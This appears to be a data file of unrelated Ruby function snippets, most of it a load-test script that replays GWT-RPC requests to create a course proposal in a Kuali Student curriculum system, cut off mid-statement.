"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def convert(name = @csv_filename)\n rowIndex = 0\n excludedCols = []\n defaultCol = 0\n\n CSV.foreach(name, :quote_char => '\"', :col_sep => @csv_separator, :row_sep => :auto) do |row|\n\n if rowIndex == 0\n #check there's at least two columns\n return unless row.count > 1\n else\n #skip empty lines (or sections)\n next if row == nil or row[@keys_column].nil?\n end\n\n # go through columns\n row.size.times do |i|\n next if excludedCols.include? i\n\n #header\n if rowIndex == 0\n # defaultCol can be the keyValue\n defaultCol = i if self.default_lang == row[i]\n # ignore all headers not listed in langs to create files\n (excludedCols << i and next) unless @langs.has_key?(row[i])\n\n language = Language.new(row[i])\n if @langs[row[i]].is_a?(Array)\n @langs[row[i]].each do |id|\n language.add_language_id(id.to_s)\n end\n else\n language.add_language_id(@langs[row[i]].to_s)\n end\n @languages[i] = language\n elsif !@state_column || (row[@state_column].nil? || row[@state_column] == '' || !@excluded_states.include?(row[@state_column]))\n key = row[@keys_column]\n comment = @comments_column ? row[@comments_column] : nil\n key.strip! if @stripping\n default_value = self.default_lang ? row[defaultCol] : nil\n value = self.process_value(row[i], default_value)\n @comments[key] = comment\n @languages[i].add_content_pair(key, value)\n end\n end\n\n rowIndex += 1\n end\n\n write_content\n end",
"def create\n\t\tputs \"\\nWhat would you like to create? (P)olitician or (V)oter\"\n\t\tpolitics = gets.chomp.upcase\n\t\tcase politics\n\t\twhen \"V\"\n\t\t\tvoter_creation\n\t\twhen \"P\"\n\t\t\tpolitician_creation\n\t\telse\n\t\t\tputs \"\\nSomething went wrong. Please select again\"\n\t\t\tcreate\n\t\tend\n\t\tmain_menu\n\tend",
"def langue_params\n params.require(:langue).permit(:name)\n end",
"def language_server; end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def international_create(label_options)\n create_label File.join(LABEL_URL, 'international', label_options)\n end",
"def InstallPlugin(name: nil, &proc)\n Dsl.register_rb_hook('install_plugin', [], proc, name: name)\n end",
"def add_code(cheatsheet_db, language, type, code, comment)\n cheatsheet_db.execute(\"INSERT INTO #{language} (type, code, comment) VALUES (?, ?, ?)\", [type, code, comment])\nend",
"def create_proposal(title, oversight_department, admin_org, opts={})\n \n lo_cat = \"Scientific method\"\n lo_cat_text = \"LO Cat Text\"\n \n defaults = {\n :propose_person => '%%_username%%', #user the dynvar from users.csv\n :mode => 'blank',\n :nav_homepage => true,\n :submit => true,\n :append_unique_id => false, #tell tsung to append unique id on title\n :instructor => 'fred', #BUG - HARDCODED - can't use dynvar though because of ajax search\n :collaborator => @request.config.directory[\"users\"][\"collaborator\"][\"username\"],\n :first_expected_offering => @request.config.directory[\"atp\"][\"name\"],\n :subject_area => \"BSCI\",\n :oversight_dept_number => \"65\", #BUG - right now hardcoded to BSCI, search that returned this was removed\n :course_suffix => \"123\",\n :course_short_title => \"Perf Course\",\n :course_title => title,\n :course_description => \"My fake description.\",\n :course_rationale => \"My fake rationale.\",\n :lo_create => FALSE,\n :lo_category => lo_cat,\n :lo_cat_text => lo_cat_text,\n :lo_name => @request.config.directory[\"lo\"][\"name\"],\n :admin_dep_var_name => \"admin_dep_org_id\",\n :admin_dep_var_regexp => 'org.resultColumn.orgId\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_dyn_var_name => \"proposal_id\",\n :proposal_dyn_var_regexp => '\\\"proposal\\\"\\,\\\"workflowNode\\\"\\,\\\"PreRoute\\\"\\,\\\"\\([^\\\"]+\\)',\n :proposal_doc_id_var_name => \"proposal_doc_id\",\n :proposal_doc_id_var_regexp => 'workflowId\\\"\\,\\\"\\([^\\\"]+\\)\\\"',\n :clu_ref_dyn_var_name => \"clu_ref_id\",\n :clu_ref_dyn_var_regexp => '\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :result_com_var_name => \"result_component_id\",\n :result_com_var_regexp => '\\\"ResultComponent 1\\\"\\,\\\"\\([^\\\"]+\\)',\n :enroll_est_var_name => \"default_enrollment_estimate_id\",\n :enroll_est_var_regexp => 'defaultEnrollmentEstimate\\\"\\,\\\"kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_var_name => \"lab_id\",\n :lab_var_regexp => 'draft\\\"\\,\\\"unitsContentOwner\\\"\\,\\\"Lab\\\"\\,\\\"\\([^\\\"]+\\)',\n :lab_fee_id_name => 'cp_lab_fee_id',\n :lab_fee_id_regexp => 'kuali.enum.type.feeTypes.labFee\\\"\\,\\\"\\([^\\\"]+\\)',\n :revenues_id_name => 'cp_revenues_id',\n :revenues_id_regexp => 'revenues\\\"\\,\\\"\\([^\\\"]+\\)',\n :revenue_id_name => 'cp_revenue_id',\n :revenue_id_regexp => 'REVENUE\\\"\\,\\\"\\([^\\\"]+\\)',\n :joints_var_name => \"joints_num\",\n :joints_var_regexp => 'joints\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"\\([^\\\"]+\\)',\n :fee_info_id_dyn_var_name => 'fee_info_id',\n :fee_info_id_dyn_var_regexp => '\\\"fees\\\"\\,\\\"\\([^\\\"]+\\)',\n :fee_info_dyn_var_name => 'fee_info',\n :fee_info_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluFeeInfo\\\"\\,\\\"\\([^\\\"]+\\)',\n :clu_info_dyn_var_name => 'clu_info',\n :clu_info_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluInfo\\\"\\,\\\"\\([^\\\"]+\\)',\n :lu_dto_clu_format_dyn_var_name => \"lu_dto_clu_format\",\n :lu_dto_clu_format_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluInfo\\\"\\,\\\"Credit Course\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"formats\\\"\\,\\\"\\([^\\\"]+\\)',\n :lu_dto_clu_activities_dyn_var_name => \"lu_dto_clu_activites\",\n :lu_dto_clu_activities_dyn_var_regexp => 'org.kuali.student.lum.lu.dto.CluInfo\\\"\\,\\\"Credit Course\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"formats\\\"\\,\\\"[^\\\"]+\\\"\\,\\\"0\\\"\\,\\\"activities\\\"\\,\\\"\\([^\\\"]+\\)',\n :outcome_id_var_name => \"outcome_id\",\n :outcome_id_var_regexp => 'outcomeId\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_var_name => \"lo_category\",\n 
#:lo_category_var_regexp => lo_cat_text + '\\\"\\,\\\"plain\\\"\\,\\\"id\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_var_regexp => lo_cat_text + '\\\"\\,\\\"plain\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_category_id_var_name => \"lo_category_id\",\n :lo_category_id_var_regexp => 'lo.resultColumn.categoryId\\\"\\,\\\"\\([^\\\"]+\\)',\n :lo_child_id_dyn_var_name => \"lo_child_id\",\n :lo_child_id_dyn_var_regexp => 'childLo\\\"\\,\\\"\\([^\\\"]+\\)',\n :single_use_lo_dyn_var_name => \"single_use_lo\",\n :single_use_lo_dyn_var_regexp => 'includedSingleUseLo\\\"\\,\\\"\\([^\\\"]+\\)',\n :atp_duration_week_var_name => 'atp_duration_week',\n :atp_duration_week_var_regexp => 'kuali.atp.duration.Week\\\"\\,\\\"Week\\\"\\,\\\"\\([^\\\"]+\\)',\n :version_ind_id_name => 'cp_version_ind_id',\n :version_ind_id_regexp => 'versionIndId\\\"\\,\\\"\\([^\\\"]+\\)',\n :affliated_orgs_id_name => 'cp_affiliated_orgs_id',\n :affliated_orgs_id_regexp => 'affiliatedOrgs\\\"\\,\\\"\\([^\\\"]+\\)',\n :action_request_id_name => 'cp_action_request_id',\n :action_request_id_regexp => 'actionRequestId\\\"\\,\\\"\\([^\\\"]+\\)'\n }\n \n # Version for the doc at each step. We'll increment on each usage\n # So first usage should eval to 0\n version_indicator = -1\n \n opts = defaults.merge(opts)\n \n title << '_%%ts_user_server:get_unique_id%%' if(opts[:append_unique_id])\n \n if(opts[:mode] != \"blank\")\n # select template or copy course...\n end\n \n # Navigate to Curriculum Mgmt\n self.homepage() unless(!opts[:nav_homepage])\n \n puts \"creating proposal as: #{opts[:propose_person]}\"\n \n # Create a course\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SecurityRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|13BFCB3640903B473D12816447D1469D|org.kuali.student.common.ui.client.service.SecurityRpcService|checkAdminPermission|java.lang.String/2004016611|#{opts[:propose_person]}|useCurriculumReview|1|2|3|4|2|5|5|6|7|\"\n }, {'subst' => 'true'}\n )\n \n \n # Click Start blank proposal\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|15|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|getMetadata|java.lang.String/2004016611|java.util.Map||java.util.HashMap/962170901|documentTypeName|kuali.proposal.type.course.create|DtoState|Draft|DtoNextState|DtoWorkflowNode|PreRoute|1|2|3|4|2|5|6|7|8|4|5|9|5|10|5|11|5|12|5|13|5|7|5|14|5|15|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/statementRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|2543249A07E7952228E0E500F14F1B17|org.kuali.student.lum.program.client.rpc.StatementRpcService|getStatementTypesForStatementTypeForCourse|java.lang.String/2004016611|kuali.statement.type.course|1|2|3|4|1|5|6|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|atp.resultColumn.atpSeasonTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpDurationTypes|atp.resultColumn.atpDurTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.passFail|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.completedNotation|kuali.resultComponent.grade.percentage|lrc.search.resultComponent|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|5|11|12|11|13|11|14|11|15|11|16|0|17|18|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.finalExam.status|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponentType.credit.degree.fixed|kuali.resultComponentType.credit.degree.range|kuali.resultComponentType.credit.degree.multiple|lrc.search.resultComponentType|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|1|7|8|6|3|9|10|9|11|9|12|0|13|14|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponentType.credit.degree.fixed|kuali.resultComponentType.credit.degree.range|kuali.resultComponentType.credit.degree.multiple|lrc.search.resultComponentType|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|1|7|8|6|3|9|10|9|11|9|12|0|13|14|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponentType.credit.degree.fixed|kuali.resultComponentType.credit.degree.range|kuali.resultComponentType.credit.degree.multiple|lrc.search.resultComponentType|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|1|7|8|6|3|9|10|9|11|9|12|0|13|14|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|atp.advancedAtpSearchParam.atpType|java.lang.String/2004016611|kuali.atp.type.Spring|kuali.atp.type.Summer|kuali.atp.type.Fall|kuali.atp.type.Session1|kuali.atp.type.Session2|kuali.atp.type.Mini-mester1A|kuali.atp.type.Mini-mester1B|atp.search.advancedAtpSearch|atp.resultColumn.atpStartDate|1|2|3|4|1|5|5|0|0|6|1|7|8|6|7|9|10|9|11|9|12|9|13|9|14|9|15|9|16|0|17|18|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.rateType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.campusLocation|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|atp.resultColumn.atpSeasonTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|atp.search.atpSeasonTypes|atp.resultColumn.atpSeasonTypeName|1|2|3|4|1|5|5|0|0|6|0|7|8|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.passFail|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.completedNotation|kuali.resultComponent.grade.percentage|lrc.search.resultComponent|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|5|11|12|11|13|11|14|11|15|11|16|0|17|18|0|0|\"\n }\n )\n \n # DUPE\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|18|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lrc.queryParam.resultComponent.type|kuali.resultComponentType.grade.finalGrade|lrc.queryParam.resultComponent.idRestrictionList|java.lang.String/2004016611|kuali.resultComponent.grade.letter|kuali.resultComponent.grade.passFail|kuali.resultComponent.grade.satisfactory|kuali.resultComponent.grade.completedNotation|kuali.resultComponent.grade.percentage|lrc.search.resultComponent|lrc.resultColumn.resultComponent.id|1|2|3|4|1|5|5|0|0|6|2|7|8|0|9|7|10|6|5|11|12|11|13|11|14|11|15|11|16|0|17|18|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CommentRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|58FCBA6F511FF769D9DF8CAE72C3C369|org.kuali.student.core.comments.ui.client.service.CommentRpcService|getUserRealName|java.lang.String/2004016611|#{opts[:propose_person]}|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|subjectCode.queryParam.code||subjectCode.search.orgsForSubjectCode|subjectCode.resultColumn.orgLongName|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n }\n )\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|19|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|atp.advancedAtpSearchParam.atpType|java.lang.String/2004016611|kuali.atp.type.Spring|kuali.atp.type.Summer|kuali.atp.type.Fall|kuali.atp.type.Session1|kuali.atp.type.Session2|kuali.atp.type.Mini-mester1A|kuali.atp.type.Mini-mester1B|atp.advancedAtpSearchParam.atpStartDateAtpConstraintId|atp.search.advancedAtpSearch|atp.resultColumn.atpStartDate|1|2|3|4|1|5|5|0|0|6|2|7|8|6|7|9|10|9|11|9|12|9|13|9|14|9|15|9|16|0|7|17|0|0|18|19|0|0|\"\n }\n )\n \n \n #\n # Pg1 - Course Information\n #\n\n @request.add_thinktime(5)\n\n # Course Subject Area\n # AJAX popup while typing in subject area\n for i in 1..opts[:subject_area].length\n itr = i-1\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|12|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|subjectCode.queryParam.code|#{opts[:subject_area][0..itr]}|subjectCode.search.subjectCodeGeneric|subjectCode.resultColumn.code|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|12|0|0|\"\n } \n ) \n end\n\n @request.add_thinktime(3)\n\n # Instructor\n for i in 1..opts[:instructor].length\n itr = i-1\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|12|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|person.queryParam.personGivenName|#{opts[:instructor][0..itr]}|person.search.personQuickViewByGivenName|person.resultColumn.DisplayName|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|12|0|0|\"\n } \n ) \n end\n\n\n @request.add_thinktime(22)\n\n # Save & Continue\n contents1 = 